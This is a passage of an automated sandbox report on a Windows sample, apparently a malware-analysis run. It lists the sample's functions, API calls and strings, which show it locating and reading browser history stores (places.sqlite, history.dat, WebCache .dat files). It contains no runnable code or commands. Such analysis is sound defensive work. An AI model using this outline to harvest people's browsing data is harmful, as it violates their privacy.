                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                      • API String ID: 71295984-2036018995
                                                      • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                      • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                      APIs
                                                      • wcschr.MSVCRT ref: 00414458
                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                      • String ID: "%s"
                                                      • API String ID: 1343145685-3297466227
                                                      • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                      • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                      • String ID: GetProcessTimes$kernel32.dll
                                                      • API String ID: 1714573020-3385500049
                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                      APIs
                                                      • memset.MSVCRT ref: 004087D6
                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                      • memset.MSVCRT ref: 00408828
                                                      • memset.MSVCRT ref: 00408840
                                                      • memset.MSVCRT ref: 00408858
                                                      • memset.MSVCRT ref: 00408870
                                                      • memset.MSVCRT ref: 00408888
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 2911713577-0
                                                      • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                      • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                      APIs
                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcmp
                                                      • String ID: @ $SQLite format 3
                                                      • API String ID: 1475443563-3708268960
                                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpqsort
                                                      • String ID: /nosort$/sort
                                                      • API String ID: 1579243037-1578091866
                                                      • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                      • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                      APIs
                                                      • memset.MSVCRT ref: 0040E60F
                                                      • memset.MSVCRT ref: 0040E629
                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                      Strings
                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                      • API String ID: 2887208581-2114579845
                                                      • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                      • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                      APIs
                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoadLockSizeof
                                                      • String ID:
                                                      • API String ID: 3473537107-0
                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                      APIs
                                                      Strings
                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                      • API String ID: 2221118986-1725073988
                                                      • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                      • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??3@DeleteObject
                                                      • String ID: r!A
                                                      • API String ID: 1103273653-628097481
                                                      • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                      • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@
                                                      • String ID:
                                                      • API String ID: 1033339047-0
                                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                      APIs
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$memcmp
                                                      • String ID: $$8
                                                      • API String ID: 2808797137-435121686
                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                      Strings
                                                      • duplicate column name: %s, xrefs: 004307FE
                                                      • too many columns on %s, xrefs: 00430763
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: duplicate column name: %s$too many columns on %s
                                                      • API String ID: 0-1445880494
                                                      • Opcode ID: 93b9582cf047c94b57d064edc5564507e5ded9912264045a732c21487ec891bf
                                                      • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                      • Opcode Fuzzy Hash: 93b9582cf047c94b57d064edc5564507e5ded9912264045a732c21487ec891bf
                                                      • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                      APIs
                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                      • String ID:
                                                      • API String ID: 1979745280-0
                                                      • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                      • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                      APIs
                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                      • free.MSVCRT ref: 00418803
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                      • String ID:
                                                      • API String ID: 1355100292-0
                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                      APIs
                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                      • memset.MSVCRT ref: 00403A55
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                      • String ID: history.dat$places.sqlite
                                                      • API String ID: 2641622041-467022611
                                                      • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                      • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                      APIs
                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                      • GetLastError.KERNEL32 ref: 00417627
